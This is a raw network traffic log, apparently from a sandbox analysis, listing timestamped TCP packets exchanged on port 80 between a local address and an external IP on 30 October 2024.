                                                                                                          Oct 30, 2024 08:32:00.914772034 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.914788008 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.914799929 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.914813995 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.914885044 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.915019035 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.915031910 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.915047884 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.915050030 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.915055990 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.915065050 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.915076017 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.915077925 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.915087938 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.915107965 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.915119886 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.915911913 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.915942907 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.915956974 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.915960073 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.915968895 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.915981054 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.915987968 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.916007042 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.968096972 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.968110085 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.968187094 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.033423901 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033507109 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.033626080 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033638000 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033649921 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033662081 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033682108 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.033701897 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.033845901 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033863068 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033875942 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033885956 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033886909 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.033896923 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.033900023 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.033912897 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.033922911 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.033943892 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.034679890 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.034693003 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.034703970 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.034729958 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.034738064 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.128796101 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.128809929 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.128940105 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.152376890 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152425051 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152436972 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152439117 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.152450085 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152462959 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152470112 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.152492046 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.152492046 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.152530909 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.152760029 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152780056 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152791977 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152831078 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.152831078 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.152843952 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152858973 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.152899981 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.152899981 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.153698921 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.153712034 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.153723001 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.153759956 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.153759956 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.159681082 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.247410059 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.247479916 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.247529984 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.247579098 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.271322966 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271333933 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271341085 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271353960 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271361113 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271409988 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.271409988 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.271820068 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271831989 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271842957 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271878958 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.271879911 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271878958 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.271897078 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.271938086 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.271938086 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.272645950 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.272666931 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.272677898 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.272700071 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.272700071 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.272735119 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.278609037 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.389805079 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.389878035 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.389894009 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.389906883 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.389919043 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.389936924 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.389966011 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.389966011 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.390012026 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.390060902 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.390072107 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.390084982 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.390120983 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.390120983 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.390631914 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.390677929 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.390701056 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.390744925 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.390750885 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.390779018 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.390793085 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.390793085 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.390832901 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.390834093 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.391243935 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.391284943 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.391288042 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.391320944 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.391333103 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.391336918 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.391354084 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.391362906 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.391385078 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.391385078 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.392035961 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.392057896 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.392088890 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.392088890 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.392144918 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.509788036 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.509804964 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.509844065 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.509865999 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.509901047 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.509954929 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.509999990 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510006905 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510023117 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510055065 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510062933 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510065079 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510080099 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510093927 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510102034 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510114908 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510128975 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510138988 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510140896 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510154009 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510159016 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510180950 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510180950 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510193110 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510937929 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510951042 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510965109 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510978937 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.510984898 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.510999918 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.511008978 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.628391981 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.628411055 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.628427029 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.628479958 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.628488064 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.628494024 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.628500938 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.628510952 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.628520966 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.628529072 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.628551960 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629246950 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629271030 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629287004 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629307985 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629321098 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629336119 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629350901 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629367113 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629379988 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629385948 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629405975 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629426003 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629441023 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629455090 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629467010 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629472017 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629477978 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629492044 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629488945 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.629503012 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.629539967 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.630084038 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.630098104 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.630112886 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.630136013 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.630147934 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.747121096 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.747137070 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.747392893 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766516924 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766532898 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766547918 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766561985 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766577005 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766592026 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766601086 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766601086 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766613007 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766632080 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766633034 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766664028 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766848087 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766863108 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766885996 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766891956 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766910076 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766911983 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766925097 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766932011 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766941071 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766948938 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766956091 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.766973972 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766973972 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.766993999 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.767762899 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.767776966 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.767791986 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.767817020 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.767817020 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.767851114 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.769397020 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.865698099 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.865716934 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.865732908 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.865820885 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.865823984 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.865847111 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.865861893 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.865875006 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.865876913 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.865890980 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.865931988 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.866323948 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.866386890 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.866492033 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.866507053 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.866520882 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.866533995 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.866547108 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.866579056 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.866579056 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.884429932 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.884445906 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.884497881 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.884511948 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.884536028 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.884557009 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.884572029 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.884578943 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.884587049 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.884591103 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.884602070 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.884608030 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.884625912 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.884640932 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.884845018 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.884886026 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.984788895 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.984824896 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.984839916 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.984853029 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.984868050 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.984882116 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.984896898 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.984910965 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.984941959 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.985007048 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.985007048 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.985400915 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.985416889 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.985430956 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.985471964 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.985471964 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.985738993 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.985754967 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.985769033 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:01.985805035 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:01.985805035 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.003954887 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.003969908 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.003983974 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.003997087 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.004012108 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.004025936 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.004029989 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.004067898 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.004074097 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.004105091 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.004132032 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.004267931 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.004322052 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.103630066 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.103655100 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.103671074 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.103683949 CET804916487.120.84.38192.168.2.22
